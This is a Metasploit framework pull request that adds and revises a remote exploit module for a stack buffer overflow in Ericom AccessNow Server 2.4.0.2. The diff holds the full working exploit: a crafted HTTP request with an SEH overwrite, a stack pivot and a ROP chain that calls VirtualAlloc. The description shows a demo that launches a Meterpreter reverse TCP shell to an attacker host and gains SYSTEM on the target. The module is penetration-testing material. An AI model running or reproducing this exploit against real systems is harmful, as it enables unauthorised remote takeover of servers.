### PR TITLE
Add module for ZDI-14-160 Ericom AccessNow Server Buffer Overflow

### DIFF
--- a/modules/exploits/windows/http/ericom_access_now_bof.rb
+++ b/modules/exploits/windows/http/ericom_access_now_bof.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
         vulnerability is due to an insecure usage of vsprintf with used controlled data,
         which can be triggered with a malformed HTTP request. This module has been tested
-        successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003
+        successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
         Server SP2.
       },
       'Author'         =>
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Privileged'     => true,
       'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
       'Payload'        =>
         {
           'Space'    => 4096,
@@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
-          [ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]',
+          [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
             {
               'RopOffset' => 62,
               'Offset' => 30668,
@@ -63,22 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri' => '/AccessNow/start.html'
     })
 
-    if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/
-      return Exploit::CheckCode::Detected
+    unless res && res.code == 200 && res.headers['Server']
+      return Exploit::CheckCode::Safe
     end
 
-    return Exploit::CheckCode::Safe
+    if res.headers['Server'] =~ /Ericom AccessNow Server/
+      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
+    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
+      return Exploit::CheckCode::Detected # Ericom AccessNow 3
+    end
+
+    Exploit::CheckCode::Unknown
   end
 
   def exploit_uri
-    uri = "A " # To ensure a "malformed request" error message
-    uri << "C" * (62)
+    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
+    uri << rand_text(target['RopOffset'])
     uri << create_rop_chain
     uri << payload.encoded
-    print_status("#{Rex::Text.to_hex_dump(payload.encoded)}")
-    uri << "B" * (0x77cc - uri.length)
-    uri << "CCCC" #nseh
-    uri << [0x104da1e5].pack("V") #seh
+    uri << rand_text(target['Offset'] - uri.length)
+    uri << rand_text(4) # nseh
+    uri << [target.ret].pack("V") # seh
 
     uri
   end
@@ -96,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
     # rop chain generated with mona.py - www.corelan.be
     rop_gadgets =
       [
-        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
-        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
         0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
         0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
         0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]

--- a/modules/exploits/windows/http/ericom_access_now_bof.rb
+++ b/modules/exploits/windows/http/ericom_access_now_bof.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Ericom AccessNow Server Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
-        vulnerability is due to an insecure usage of vsprintf with used controlled data,
+        vulnerability is due to an insecure usage of vsprintf with user controlled data,
         which can be triggered with a malformed HTTP request. This module has been tested
         successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
         Server SP2.

--- a/modules/exploits/windows/http/ericom_access_now_bof.rb
+++ b/modules/exploits/windows/http/ericom_access_now_bof.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ericom AccessNow Server Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
+        vulnerability is due to an insecure usage of vsprintf with used controlled data,
+        which can be triggered with a malformed HTTP request. This module has been tested
+        successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003
+        Server SP2.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability Discovery
+          'juan vazquez', # Metasploit Module
+        ],
+      'References'     =>
+        [
+          ['ZDI', '14-160'],
+          ['CVE', '2014-3913'],
+          ['BID', '67777'],
+          ['URL','http://www.ericom.com/security-ERM-2014-610.asp']
+        ],
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'Space'    => 4096,
+          'BadChars' => "\x00\x0d\x0a",
+          'DisableNops' => true,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Targets'        =>
+        [
+          [ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]',
+            {
+              'RopOffset' => 62,
+              'Offset' => 30668,
+              'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Jun 2 2014',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(8080)], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri' => '/AccessNow/start.html'
+    })
+
+    if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit_uri
+    uri = "A " # To ensure a "malformed request" error message
+    uri << "C" * (62)
+    uri << create_rop_chain
+    uri << payload.encoded
+    print_status("#{Rex::Text.to_hex_dump(payload.encoded)}")
+    uri << "B" * (0x77cc - uri.length)
+    uri << "CCCC" #nseh
+    uri << [0x104da1e5].pack("V") #seh
+
+    uri
+  end
+
+  def exploit
+    print_status("#{peer} - Sending malformed request...")
+    send_request_raw({
+      'method'  => 'GET',
+      'uri'      => exploit_uri,
+      'encode'  => false
+    }, 1)
+  end
+
+  def create_rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets =
+      [
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
+        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
+        0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
+        0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
+        0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]
+        0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]
+        0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]
+        0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xffffffff, # Value to negate, will become 0x00000001
+        0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+        0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]
+        0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)
+        0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]
+        0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]
+        0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0xffffffc0, # Value to negate, will become 0x00000040
+        0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]
+        0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]
+        0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]
+        0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]
+        0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]
+        0x90909090, # nop
+        0x1052cfce  # PUSHAD # RETN [AccessNowAccelerator32.dll]
+      ].pack("V*")
+
+    rop_gadgets
+  end
+
+end


### PR DESCRIPTION
Tested successfully on Win2003 SP2 and Ericom AccessNow Server 2.4.0.2.
## Verification
- [x] Install Windows 2003 SP2
- [x] Install Ericom AccessNow Server 2.4.0.2 which can be downloaded from http://www.ericom.com/accessnow_older_version.asp (at least at the time of writing). I couldn't find unpatched 3 version installer :.
- [x] Use the module like in the demo, hopefully enjoy sessions!

```
msf > use exploit/windows/http/ericom_access_now_bof
msf exploit(ericom_access_now_bof) > set rhost 172.16.158.182
rhost => 172.16.158.182
msf exploit(ericom_access_now_bof) > check
[*] 172.16.158.182:8080 - The target appears to be vulnerable.
msf exploit(ericom_access_now_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ericom_access_now_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.182:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 172.16.158.182
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.182:1054) at 2014-06-17 15:06:41 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.182 - Meterpreter session 1 closed.  Reason: User exit
```
